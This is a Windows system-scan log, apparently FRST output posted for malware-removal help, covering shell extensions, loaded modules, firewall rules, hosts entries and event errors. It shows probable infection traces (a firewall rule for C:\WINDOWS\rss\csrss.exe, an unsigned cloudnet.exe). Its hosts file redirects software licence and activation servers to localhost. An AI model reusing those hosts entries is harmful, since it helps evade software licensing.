ShellIconOverlayIdentifiers-x32: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ContextMenuHandlers1: [AESCrypt] -> {35872D53-3BD4-45FA-8DB5-FFC47D4235E7} => C:\Program Files\AESCrypt\AESCrypt.dll [2015-04-17] (Packetizer, Inc.) [File not signed]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2018-07-23] (Notepad++ -> )
ContextMenuHandlers1: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => C:\Program Files\PDFCreator\PDFCreatorShell.DLL [2017-01-31] (pdfforge GmbH -> pdfforge GmbH)
ContextMenuHandlers1: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} =>  -> No File
ContextMenuHandlers5: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\SR\Desktop\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maxis\SimCity 4\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_AlpesNordBP.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_AlpesNordBP.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_SUMMER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_SUMMER.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_WINTER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_WINTER.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Summer.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_SummerBasePack.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Winter.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Summer.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_SummerBasePack.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Winter.bat ()

==================== Loaded Modules (Whitelisted) =============

2019-11-24 19:12 - 2008-10-15 16:44 - 000205312 _____ () [File not signed] C:\Users\SR\AppData\Local\Temp\is-94DQB.tmp\itdownload.dll
2019-11-24 19:12 - 2019-11-24 19:12 - 000903680 _____ () [File not signed] C:\Users\SR\AppData\Local\Temp\is-FML3U.tmp\Guitar.tmp
2009-02-23 12:28 - 2009-02-23 12:28 - 000013824 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctagent.DLL
2009-02-23 12:27 - 2009-02-23 12:27 - 000175104 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDCIFCE.DLL
2009-02-23 12:16 - 2009-02-23 12:16 - 000067584 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDPROXY.DLL
2009-02-23 12:28 - 2009-02-23 12:28 - 000061952 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctpcmcia.DLL
2009-02-23 12:28 - 2009-02-23 12:28 - 000046592 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctspkhlp.DLL
2017-08-26 16:54 - 2017-08-26 16:54 - 000410112 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2016-12-07 20:44 - 2016-12-07 20:44 - 000373248 _____ (IntelleSoft) [File not signed] C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\BugTrapU-x64.dll
2017-09-29 00:39 - 2017-09-29 00:39 - 000252928 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbPc.DLL
2019-02-18 21:23 - 2019-10-26 22:44 - 000281600 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVFILESYSTEMMETADATA.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000400896 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvApi.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001124864 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000519680 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000836608 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000585008 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVCatalog.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001642800 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000177968 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvStreamingManager.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001010992 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVMANIFEST.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001091888 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVPOLICY.dll
2019-11-24 19:12 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [File not signed] C:\Users\SR\AppData\Local\Temp\is-94DQB.tmp\idp.dll
2015-04-17 17:30 - 2015-04-17 17:30 - 000139264 _____ (Packetizer, Inc.) [File not signed] C:\Program Files\AESCrypt\AESCrypt.dll
2017-05-26 12:29 - 2017-05-26 12:29 - 000116224 _____ (pdfforge GmbH) [File not signed] C:\Windows\System32\pdfcmon.dll
2019-11-24 19:12 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [File not signed] C:\Users\SR\AppData\Local\Temp\is-94DQB.tmp\psvince.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:907E90B1 [246]
AlternateDataStreams: C:\Users\SR\AppData\Local\OPTvJO7k:lSGoicsydMwI75AardtQAZCSFhB [2296]

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) =================

==================== Internet Explorer trusted/restricted ==========

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-07-10 13:04 - 2019-06-18 13:33 - 000001666 ____R C:\Windows\system32\drivers\etc\hosts
127.0.0.1 precisionmanuals.com
127.0.0.1 www.precisionmanuals.com
127.0.0.1 license.precisionmanuals.com
127.0.0.1                   auth.cycling74.com
127.0.0.1                   auth64.cycling74.com
127.0.0.1    www.techsmith.com
127.0.0.1    activation.cloud.techsmith.com
127.0.0.1    oscount.techsmith.com
127.0.0.1    updater.techsmith.com
127.0.0.1    camtasiatudi.techsmith.com
127.0.0.1    tsccloud.cloudapp.net
127.0.0.1    assets.cloud.techsmith.com
127.0.0.1       65.52.240.48
127.0.0.1       oscount.techsmith.com
127.0.0.1       69.167.144.18
127.0.0.1    www.techsmith.com
127.0.0.1    activation.cloud.techsmith.com
127.0.0.1    oscount.techsmith.com
127.0.0.1    updater.techsmith.com
127.0.0.1    camtasiatudi.techsmith.com
127.0.0.1    tsccloud.cloudapp.net
127.0.0.1    assets.cloud.techsmith.com

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> D:\Program Files (x86)\Embarcadero\Studio\19.0\bin;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl;D:\Program Files (x86)\Embarcadero\Studio\19.0\bin64;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl\Win64;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static;C:\Program Files\Microsoft SQL Server\110\Tools\Binn\;C:\Program Files (x86)\GtkSharp\2.12\bin;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files (x86)\QuickTime\QTSystem\;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\dotnet\
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 1.1.1.1 - 1.0.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "Greenshot"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "StartCCC"
HKLM\...\StartupApproved\Run32: => "AsioThk32Reg"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Viber"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{91AC375A-B6EC-4001-802D-B72C16747E11}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{A6F1920D-D88E-48EB-B0AB-6804B6D1752E}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{93EDDD15-9B7C-4447-ABAE-501201FF8A61}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{C3DDABFC-FE5E-4CC3-9C79-344AB623C7DB}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [TCP Query User{BF23CCF8-3722-4E94-BBCD-048D218B58ED}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.)
FirewallRules: [UDP Query User{CCB1BECF-8668-4A0A-81EA-7482FB3A4DE8}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.)
FirewallRules: [{F0D42ECE-AF71-4409-A450-E3F863137671}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{5EBA522B-A804-426C-839D-4449D306556A}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{23C98884-7855-4B47-9DCE-7656330C8DFC}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{5D8EC213-3D1D-4722-956F-E0A2CC9E212B}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{021D1265-3A31-43D0-9520-4E7D81972374}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed]
FirewallRules: [UDP Query User{C66DEFFE-A5F1-4B7E-A74E-F9368D6D6EC0}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed]
FirewallRules: [{A8361D34-69CE-446C-9567-9A0EFC8AF75A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F3D527C7-4F10-47C7-ABC4-820BCD31768B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{486EB322-4CC3-4726-8F83-95DCE3A309AE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F7124E26-2B62-49EC-8E6B-F2B5F4288ECC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{287425B3-761D-4793-BD0B-39346EA97794}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{629429D6-E5F3-4D9E-87A1-668E6E2578AF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{09C709D6-BEC4-4FE0-8569-D32BE72EBB20}] => (Allow) LPort=8318
FirewallRules: [{97B5B393-FE3F-4B8E-8BA8-A8FDEE7DF18F}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{F13A0E2B-3CE0-497A-A237-A2034F33A8E6}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{39B466A5-4C25-4C27-90D2-6CA05D4A0AF4}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{DD68D091-C860-4103-B578-87949E0C39C5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{3FA6B652-D2F9-43D5-8487-2643470B90D9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{65D7C44B-7B22-436F-81D1-83ED80E67633}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [TCP Query User{EEA7C7A7-33BA-41A2-BE41-1A26259EAD15}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe] => (Allow) D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe No File
FirewallRules: [UDP Query User{4841B43C-6AEF-4BA9-8382-61909EEA1DE3}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe] => (Allow) D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe No File
FirewallRules: [{B74858EF-98FA-4A92-81DC-4F17DCAB4DEA}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc -> Dropbox, Inc.)
FirewallRules: [TCP Query User{D17DCF5C-B1C8-4216-9754-89508AAA6F02}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed]
FirewallRules: [UDP Query User{59A3E512-E9CB-419C-AB1B-2B0EF51A5B9C}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed]
FirewallRules: [{EDEA1E3E-A12C-4F24-AFFD-F819C6FC187E}] => (Allow) C:\WINDOWS\rss\csrss.exe () [File not signed]
FirewallRules: [{CB2B1E04-1443-4466-A2D4-6FECE639BD29}] => (Allow) C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]

==================== Restore Points =========================

19-11-2019 13:12:33 Scheduled Checkpoint

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (11/24/2019 07:35:57 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/24/2019 07:12:42 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/24/2019 07:12:09 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/24/2019 07:07:44 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/24/2019 07:07:12 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/24/2019 07:01:40 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/24/2019 07:01:07 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/24/2019 06:57:31 PM) (Source: MsiInstaller) (EventID: 10005) (User: DESKTOP-A0OS1Q6)
Description: Product: Online Application -- Error 4106. An error was encountered while creating a scheduled task: 'Online Application V2G1.job'. Error description: The parameter is incorrect.


System errors:
=============
Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscDataProtection
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscBrokerManager
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscBrokerManager
 and APPID
Unavailable
